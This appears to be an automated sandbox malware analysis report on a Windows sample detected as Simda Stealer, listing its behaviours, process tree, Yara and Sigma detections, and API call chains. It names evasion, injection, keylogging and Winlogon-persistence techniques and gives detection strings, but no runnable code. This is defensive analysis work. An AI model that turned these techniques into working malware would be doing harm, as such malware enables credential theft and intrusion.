Windows Analysis Report
5AFlyarMds.exe

Overview

General Information

Sample name: 5AFlyarMds.exe
renamed because original name is a hash value
Original sample name: Virus.Hijack.ATA_virussign.com_fcf6de7351633752cf96e861d60b2a8c.exe
Analysis ID: 1507126
MD5: fcf6de7351633752cf96e861d60b2a8c
SHA1: 548662dfac5acd8306b09d0af1385b6615b423da
SHA256: def2f0b62f4af989da3cd943e3120ed81c9fb24979925faac774cca11eb2ea54
Tags: Simda

Detection

Simda Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Simda Stealer
AI detected suspicious sample
Allocates memory in foreign processes
Checks if browser processes are running
Contains VNC / remote desktop functionality (version string found)
Contains functionality to behave differently if execute on a Russian/Kazak computer
Contains functionality to capture and log keystrokes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to detect sandboxes (registry SystemBiosVersion/Date)
Contains functionality to infect the boot sector
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Creates an undocumented autostart registry key
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking volume information)
Found evasive API chain checking for user administrative privileges
Found stalling execution ending in API Sleep call
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Monitors registry run keys for changes
Moves itself to temp directory
Queries Google from non browser process on port 80
Queries random domain names (often used to prevent blacklisting and sinkholes)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Tries to resolve many domain names, but no domain seems valid
Uses known network protocols on non-standard ports
Writes to foreign memory regions
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to create system tasks
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables security privileges
Executes massive DNS lookups (> 100)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (might use process or thread times for sandbox detection)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May initialize a security null descriptor
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Uncommon Svchost Parent Process
Tries to disable installed Antivirus / HIPS / PFW
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 5AFlyarMds.exe (PID: 7508 cmdline: "C:\Users\user\Desktop\5AFlyarMds.exe" MD5: FCF6DE7351633752CF96E861D60B2A8C)
    • svchost.exe (PID: 7524 cmdline: "C:\Windows\apppatch\svchost.exe" MD5: 9A96CBEB34AD570586652BD7772616D6)
      • cUKxeliGgCix.exe (PID: 6636 cmdline: "C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 3736 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6636 -s 804 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • cUKxeliGgCix.exe (PID: 7092 cmdline: "C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 7260 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7092 -s 800 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • cUKxeliGgCix.exe (PID: 6976 cmdline: "C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 864 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6976 -s 748 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • cUKxeliGgCix.exe (PID: 6828 cmdline: "C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 3636 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6828 -s 760 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • cUKxeliGgCix.exe (PID: 6708 cmdline: "C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • cUKxeliGgCix.exe (PID: 6472 cmdline: "C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • cUKxeliGgCix.exe (PID: 6348 cmdline: "C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • cUKxeliGgCix.exe (PID: 7136 cmdline: "C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • cUKxeliGgCix.exe (PID: 7068 cmdline: "C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • cUKxeliGgCix.exe (PID: 7000 cmdline: "C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • cUKxeliGgCix.exe (PID: 6924 cmdline: "C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • cUKxeliGgCix.exe (PID: 6808 cmdline: "C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • cUKxeliGgCix.exe (PID: 6788 cmdline: "C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • cUKxeliGgCix.exe (PID: 6704 cmdline: "C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • cUKxeliGgCix.exe (PID: 6660 cmdline: "C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • cUKxeliGgCix.exe (PID: 6556 cmdline: "C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000001.00000002.2975747606.00000000029B0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x4b260:$a1: name=%s&port=%u
  • 0x4a9f8:$a2: data_inject
  • 0x4abe4:$a3: keylog.txt
  • 0x4a88d:$a4: User-agent: %s]]]
  • 0x4b3b4:$a5: %s\%02d.bmp
00000001.00000003.2122838115.00000000039C0000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
0000001B.00000002.2126205049.0000000001590000.00000040.00000001.00020000.00000000.sdmp | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x49e60:$a1: name=%s&port=%u
  • 0x495f8:$a2: data_inject
  • 0x497e4:$a3: keylog.txt
  • 0x4948d:$a4: User-agent: %s]]]
  • 0x49fb4:$a5: %s\%02d.bmp
00000001.00000003.2116591333.00000000039C0000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
00000001.00000003.2148937854.00000000039C0000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x49260:$a1: name=%s&port=%u
  • 0x489f8:$a2: data_inject
  • 0x48be4:$a3: keylog.txt
  • 0x4888d:$a4: User-agent: %s]]]
  • 0x493b4:$a5: %s\%02d.bmp
Source | Rule | Description | Author | Strings
1.3.svchost.exe.39c0000.10.unpack | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x48660:$a1: name=%s&port=%u
  • 0x47df8:$a2: data_inject
  • 0x47fe4:$a3: keylog.txt
  • 0x47c8d:$a4: User-agent: %s]]]
  • 0x487b4:$a5: %s\%02d.bmp
0.2.5AFlyarMds.exe.400000.1.unpack | JoeSecurity_SimdaStealer | Yara detected Simda Stealer | Joe Security
    0.2.5AFlyarMds.exe.400000.1.unpack | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
    • 0x4f260:$a1: name=%s&port=%u
    • 0x4e9f8:$a2: data_inject
    • 0x4ebe4:$a3: keylog.txt
    • 0x4e88d:$a4: User-agent: %s]]]
    • 0x4f3b4:$a5: %s\%02d.bmp
    1.2.svchost.exe.2c90000.6.unpack | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
    • 0x49260:$a1: name=%s&port=%u
    • 0x489f8:$a2: data_inject
    • 0x48be4:$a3: keylog.txt
    • 0x4888d:$a4: User-agent: %s]]]
    • 0x493b4:$a5: %s\%02d.bmp
    1.3.svchost.exe.39c0000.32.unpack | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
    • 0x48660:$a1: name=%s&port=%u
    • 0x47df8:$a2: data_inject
    • 0x47fe4:$a3: keylog.txt
    • 0x47c8d:$a4: User-agent: %s]]]
    • 0x487b4:$a5: %s\%02d.bmp

    System Summary

    Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\5AFlyarMds.exe, ProcessId: 7508, TargetFilename: C:\Windows\apppatch\svchost.exe
    Source: Process started | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\5AFlyarMds.exe", ParentImage: C:\Users\user\Desktop\5AFlyarMds.exe, ParentProcessId: 7508, ParentProcessName: 5AFlyarMds.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 7524, ProcessName: svchost.exe
    Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\system32\userinit.exe,C:\Windows\apppatch\svchost.exe,, EventID: 13, EventType: SetValue, Image: C:\Windows\apppatch\svchost.exe, ProcessId: 7524, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\userinit
    Source: Process started | Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\5AFlyarMds.exe", ParentImage: C:\Users\user\Desktop\5AFlyarMds.exe, ParentProcessId: 7508, ParentProcessName: 5AFlyarMds.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 7524, ProcessName: svchost.exe
    Source: Process started | Author: vburov: Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\5AFlyarMds.exe", ParentImage: C:\Users\user\Desktop\5AFlyarMds.exe, ParentProcessId: 7508, ParentProcessName: 5AFlyarMds.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 7524, ProcessName: svchost.exe

    AV Detection

    Source: 5AFlyarMds.exe | Avira: detected
    Source: C:\Windows\apppatch\svchost.exe | Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
    Source: Submited Sample | Integrated Neural Analysis Model: Matched 99.8% probability
    Source: C:\Windows\apppatch\svchost.exe | Joe Sandbox ML: detected
    Source: 5AFlyarMds.exe | Joe Sandbox ML: detected

    Compliance

    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe | Unpacked PE file: 6.2.cUKxeliGgCix.exe.2550000.2.unpack
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe | Unpacked PE file: 13.2.cUKxeliGgCix.exe.3100000.2.unpack
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe | Unpacked PE file: 19.2.cUKxeliGgCix.exe.2910000.2.unpack
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe | Unpacked PE file: 23.2.cUKxeliGgCix.exe.3200000.2.unpack
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe | Unpacked PE file: 27.2.cUKxeliGgCix.exe.1590000.2.unpack
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe | Unpacked PE file: 31.2.cUKxeliGgCix.exe.1040000.2.unpack
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe | Unpacked PE file: 37.2.cUKxeliGgCix.exe.3140000.2.unpack
    Source: C:\Users\user\Desktop\5AFlyarMds.exe | Unpacked PE file: 0.2.5AFlyarMds.exe.400000.1.unpack
    Source: C:\Windows\apppatch\svchost.exe | Unpacked PE file: 1.2.svchost.exe.400000.0.unpack
    Source: 5AFlyarMds.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:55332 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:55335 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:55360 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:55363 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:54050 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:54059 version: TLS 1.2
    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: cUKxeliGgCix.exe, 00000005.00000000.2077994915.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 00000006.00000000.2078822725.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 00000008.00000002.2333587412.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 0000000D.00000000.2083432315.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 0000000F.00000002.2111175988.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 00000013.00000002.2111926666.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 00000015.00000000.2111093320.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 00000017.00000002.2119064943.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 00000019.00000000.2117612935.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 0000001B.00000002.2125197875.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 0000001D.00000002.2127871048.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 0000001F.00000000.2126229043.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 00000021.00000000.2129102058.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 00000023.00000000.2133478694.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 00000025.00000002.2142572120.000000000059E000.00000002.00000001.01000000.00000009.sdmp, cUKxeliGgCix.exe, 00000027.00000002.2147362137.000000000059E000.00000002.00000001.01000000.00000009.sdmp
    Source: C:\Windows\apppatch\svchost.exe Code function: 1_2_02CBDAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,1_2_02CBDAE8
    Source: C:\Windows\apppatch\svchost.exe Code function: 1_2_02CBDA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,1_2_02CBDA50
    Source: C:\Windows\apppatch\svchost.exe Code function: 1_2_02CB9910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,1_2_02CB9910
    Source: C:\Windows\apppatch\svchost.exe Code function: 1_2_02CAD120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,1_2_02CAD120
    Source: C:\Windows\apppatch\svchost.exe Code function: 1_2_02C97680 GetHandleInformation,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,1_2_02C97680
    Source: C:\Windows\apppatch\svchost.exe Code function: 1_2_02CAE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,1_2_02CAE6B0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: 5_2_02F8DAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,5_2_02F8DAE8
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: 5_2_02F8DA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,5_2_02F8DA50
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: 5_2_02F7D120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,5_2_02F7D120
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: 5_2_02F89910 Sleep,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,5_2_02F89910
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: 5_2_02F7E6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,5_2_02F7E6B0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: 5_2_02F67680 Sleep,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,5_2_02F67680
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: 6_2_0257DA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,6_2_0257DA50
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: 6_2_0257DAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,6_2_0257DAE8
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: 6_2_02579910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,6_2_02579910
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: 6_2_0256D120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,6_2_0256D120
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: 6_2_02557680 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,6_2_02557680
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: 6_2_0256E6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,6_2_0256E6B0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: 8_2_025EDA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,8_2_025EDA50
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: 8_2_025EDAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,8_2_025EDAE8
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: 8_2_025E9910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,8_2_025E9910
